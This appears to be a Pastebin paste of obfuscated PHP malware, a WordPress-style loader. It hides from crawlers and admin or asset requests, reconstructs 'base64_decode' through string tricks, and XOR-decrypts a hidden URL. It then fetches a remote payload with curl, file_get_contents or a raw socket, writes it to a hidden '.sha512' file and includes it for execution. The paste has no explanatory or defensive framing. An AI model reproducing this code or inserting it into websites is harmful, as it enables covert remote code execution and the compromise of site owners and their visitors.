Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- @ini_set('display_errors', '0');
- error_reporting(0);
- $bad_agents = '~google|360Spider|80legs|AIBOT|Aboundex|Acunetix|AhrefsBot|Alexibot|BLEXBot|BackDoorBot|BackWeb|Baiduspider|Bandit|BatchFTP|Bigfoot|Black.Hole|BlackWidow|BlowFish|BotALot|Buddy|BuiltBotTough|Bullseye|BunnySlippers|Cegbfeieh|CheeseBot|CherryPicker|ChinaClaw|Cogentbot|Collector|Copier|CopyRightCheck|Crescent|Custo|DIIbot|DISCo|DittoSpyder|Download Demon|Download Devil|Download Wonder|Drip|EasyDL|EirGrabber|EmailCollector|EmailSiphon|EmailWolf|EroCrawler|Exabot|Express WebPictures|Extractor|EyeNetIE|FHscan|Foobot|FrontPage|Go-Ahead-Got-It|GrabNet|Grafula|HMView|HTTrack|Harvest|IlseBot|Image Stripper|Image Sucker|Indy Library|InfoNavibot|InfoTekies|Intelliseek|InterGET|Internet Ninja|Iria|JOC|Jakarta|James BOT|Java|JennyBot|JetCar|JustView|Jyxobot|Kenjin.Spider|Keyword.Density|LNSpiderguy|LWP::Simple|LexiBot|LinkScan/8.1a.Unix|LinkWalker|LinkextractorPro|LinkpadBot|MIDown tool|MIIxpc|MJ12bot|Mag-Net|Magnet|MarkWatch|Mass Downloader|Mata.Hari|MegaIndex.ru/2.0|Memo|Microsoft URL Control|Microsoft.URL|Mirror|Missigua Locator|Mister PiX|Mozilla.\*NEWT|Mozilla\/3.Mozilla\/2.01|NAMEPROTECT|NICErsPRO|NPbot|Navroad|NearSite|Net Vampire|NetAnts|NetMechanic|NetSpider|NetZIP|Netcraft|NextGenSearchBot|NimbleCrawler|Ninja|Octopus|Offline Explorer|Offline Navigator|Openfind|OutfoxBot|PHP version tracker|PageGrabber|Papa Foto|Pockey|ProPowerBot\/2.14|ProWebWalker|Pump|QueryN.Metasearch|RMA|ReGet|RealDownload|Reaper|Recorder|RepoMonkey|SEOkicks|SearchmetricsBot|SemrushBot|Siphon|SiteExplorer|SiteSnagger|SlySearch|SmartDownload|Snake|Snapbot|Snoopy|SpaceBison|SpankBot|Sqworm|Stripper|Sucker|SuperBot|SuperHTTP|Surfbot|Szukacz\/1.4|Teleport|Telesoft|The.Intraformant|TheNomad|TightTwatBot|Titan|True_bot|TurnitinBot|TurnitinBot\/1.5|URLy.Warning|VCI|Vacuum|VoidEYE|WISENutbot|WWW-Collector-E|WWWOFFLE|Web Image Collector|Web Sucker|Web.Image.Collector|WebAuto|WebBandit|WebCopier|WebEMailExtrac.\*\" bot|WebEnhancer|WebFetch|WebGo IS|WebLeacher|WebReaper|WebSauger|WebStripper|WebWhacker|WebZIP|Webclipping.com|WebmasterWorldForumBot|Website Quester|Website eXtractor|Webster|Wget|Whacker|Widow|Xaldon|Xenu|Zeus|ZmEu|Zyborg|archive.org_bot|asterias|attach|cosmos|dragonfly|eCatch|ebingbong|flunky|gotit|hloader|humanlinks|ia_archiver|larbin|lftp|libWeb\/clsHTTP|likse|lwp-trivial|moget|niki-bot|pavuk|pcBrowser|psbot|rogerBot|sogou|spanner|spbot|suzuran|tAkeOut|turingos~i';
- $bad_urls = '#xmlrpc.php|wp-includes|wp-content|wp-login.php|wp-cron.php|\?feed=|wp-json|\/feed|\.css|\.js|\.ico|\.png|\.gif|\.bmp|\.tiff|\.mpg|\.wmv|\.mp3|\.mpeg|\.zip|\.gzip|\.rar|\.exe|\.pdf|\.doc|\.swf|\.txt|wp-admin|administrator#';
- if (!@preg_match($bad_agents, $_SERVER['HTTP_USER_AGENT']) && !function_exists('httpget') && !@preg_match($bad_urls, $_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'])) {
- $ea = '_shaesx_'; $ay = 'httpget'; $ae = 'decode'; $ea = str_replace('_sha', 'bas', $ea); $ao = 'wp_cd'; $ee = $ea.$ae; $oa = str_replace('sx', '64', $ee); $algo = 'sha512';
- $pass = "Zgc5c4MXrLszcAQOrYpaOLGePlOUMLhZ3zuKAQ==";
- function httpget($url) {
- if (function_exists('curl_init')) {
- $ch = curl_init($url);
- curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 8);
- curl_setopt($ch, CURLOPT_TIMEOUT, 15);
- curl_setopt($ch, CURLOPT_HEADER, 0);
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.154 Safari/537.36');
- $data = curl_exec($ch);
- curl_close($ch);
- return $data;
- } elseif (@ini_get('allow_url_fopen')) {
- return @file_get_contents($url);
- } else {
- $parts = parse_url($url);
- $target = $parts['host'];
- $port = isset($parts['port']) ? $parts['port'] : 80;
- $page = isset($parts['path']) ? $parts['path'] : '';
- $page .= isset($parts['query']) ? '?' . $parts['query'] : '';
- $page .= isset($parts['fragment']) ? '#' . $parts['fragment'] : '';
- $page = ($page == '') ? '/' : $page;
- if ($fp = @fsockopen($target, $port, $errno, $errstr, 3)) {
- @socket_set_option($fp, SOL_SOCKET, SO_RCVTIMEO, array("sec"=>1, "usec"=>1));
- $headers = "GET $page HTTP/1.1\r\n";
- $headers .= "Host: {$parts['host']}\r\n";
- $headers .= "Connection: Close\r\n\r\n";
- if (fwrite($fp, $headers)) {
- $resp = '';
- while (!feof($fp) && ($curr = fgets($fp, 128)) !== false) {
- $resp .= $curr;
- }
- if (isset($curr) && $curr !== false) {
- fclose($fp);
- return substr(strstr($resp, "\r\n\r\n"), 3);
- }
- }
- fclose($fp);
- }
- }
- return false;
- }
- function wp_cd($fd, $fa="")
- {
- $fe = "wp_frmfunct";
- $len = strlen($fd);
- $ff = '';
- $n = $len>100 ? 8 : 2;
- while( strlen($ff)<$len )
- {
- $ff .= substr(pack('H*', sha1($fa.$ff.$fe)), 0, $n);
- }
- return $fd^$ff;
- }
- $dirs = glob("*", GLOB_ONLYDIR);
- $ura = 0;
- foreach ($dirs as $dira) {
- if (file_exists("$dira/.$algo")) {
- $ura = 1;
- $eb = "$dira/";
- @include_once "$dira/.$algo";
- break;
- }
- $subdirs = glob("$dira/*", GLOB_ONLYDIR);
- foreach ($subdirs as $subdira) {
- if (file_exists("$subdira/.$algo")) {
- $ura = 1;
- $eb = "$subdira/";
- @include_once("$dira/.$algo");
- break;
- }
- }
- }
- if (!$ura) {
- foreach ($dirs as $dira) {
- if (fopen("$dira/.$algo", 'w')) {
- $ura = 1;
- $eb = "$dira/";
- $hdl = fopen("$dira/.$algo", 'w');
- break;
- }
- $subdirs = glob("$dira/*", GLOB_ONLYDIR);
- foreach ($subdirs as $subdira) {
- if (fopen("$subdira/.$algo", 'w')) {
- $ura = 1;
- $eb = "$subdira/";
- $hdl = fopen("$subdira/.$algo", 'w');
- break;
- }
- }
- }
- if (!$ura && fopen(".$algo", 'w')) { $ura = 1; $eb = ''; $hdl = fopen(".$algo", 'w'); }
- $reqw = $ay($ao($oa("$pass"), 'wp_function'));
- preg_match('#gogo(.*)enen#is', $reqw, $mtchs);
- fwrite($hdl, rawurldecode($mtchs[1]));
- fclose($hdl);
- @include("{$eb}.$algo");
- }
- }
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement